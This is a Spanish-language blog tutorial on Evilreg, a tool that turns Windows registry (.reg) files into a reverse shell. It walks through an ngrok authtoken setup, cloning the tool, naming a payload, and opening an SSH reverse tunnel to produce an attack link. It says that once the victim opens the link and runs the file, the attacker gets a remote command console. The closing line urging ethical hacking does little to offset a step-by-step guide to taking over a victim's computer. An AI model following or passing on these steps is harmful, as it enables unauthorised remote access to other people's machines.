Evilreg es un shell inverso que utiliza archivos de registro de Windows (.reg). La víctima confirma la ejecución de dicho archivo y obtenemos una conexión remota.
Este herramienta utiliza Ngrok.io para el reenvío de puerto TCP inverso. A continuación, se indican sus requisitos:
- Ngrok Authtoken (para el túnel TCP): Regístrate en: https://ngrok.com/signup
- Tu authtoken está disponible en tu tablero: https://dashboard.ngrok.com
- Instala tu auhtoken con el siguiente comando:
./ngrok authtoken <TU_AUTHTOKEN>
- La víctima deberá reiniciar/cerrar sesión después de instalar el archivo
.reg
2. Instalar y usar Evilreg
Empecemos. Clonamos desde el repositorio y accedemos a la carpeta del programa con los siguientes comandos:
#antiguo: git clone https://github.com/thelinuxchoice/evilreg
git clone https://github.com/8L4NK/evilreg
cd evilreg
Dentro de la ubicación de la carpeta de EvilReg, iniciamos el programa con el siguiente comando:
bash evilreg.sh
A continuación, relleno los otros campos solicitados como son: nombre de payload (esgeeks
) y redireccionamiento de página (https://esgeeks.com
). Lo que he colocado entre paréntesis lo puedes modificar a tu gusto. Sigamos…
En pantalla aparecerá un nuevo comando que debemos en una nueva ventana de terminal para obtener una URL personalizada de nuestro ataque. Yo he colocado lo siguiente.
ssh -R 80:localhost:3333 esgeeks@ssh.localhost.run
Cuando la víctima abre el enlace, podemos ver en pantalla algo como lo siguiente: Tenemos una sesión de consola abierta.
Entonces, podemos ejecutar comandos como si estuviéramos en el CMD. Por ejemplo:
Aquí hay otra captura:
¡Voila!
3. Conclusión
Si estás interesado en hackear puedes aprenderlo y trabajar como hacker ético. Un hacker ético ‘hackea’ otros PC, laptops o teléfono Android por una buena razón. Las grandes empresas y organizaciones designan hackers por su seguridad. Sigue el camino del hacking ético y no intentes entrar en la vida privada de nadie, ya que podrías terminar siendo procesado o encarcelado.
Contenido relacionado:
- Windows 10: 6 Hacks para el Registro del Sistema
- Hacking Windows para Pentester: Certutil
- CATCHYOU: Generador Payload msfvenom
Si te gusta el contenido y deseas apoyar a la mejora del sitio web, considera hacer una contribución ¡haciendo clic aquí por favor!. ¡NO ES OBLIGATORIO, GRACIAS! :’)
¿Te ha gustado este artículo? Sigue este blog en su fanpage de Facebook, TELEGRAM, Discord, Twitter, Instagram y/o YouTube para que no te pierdas del mejor contenido informático y hacking!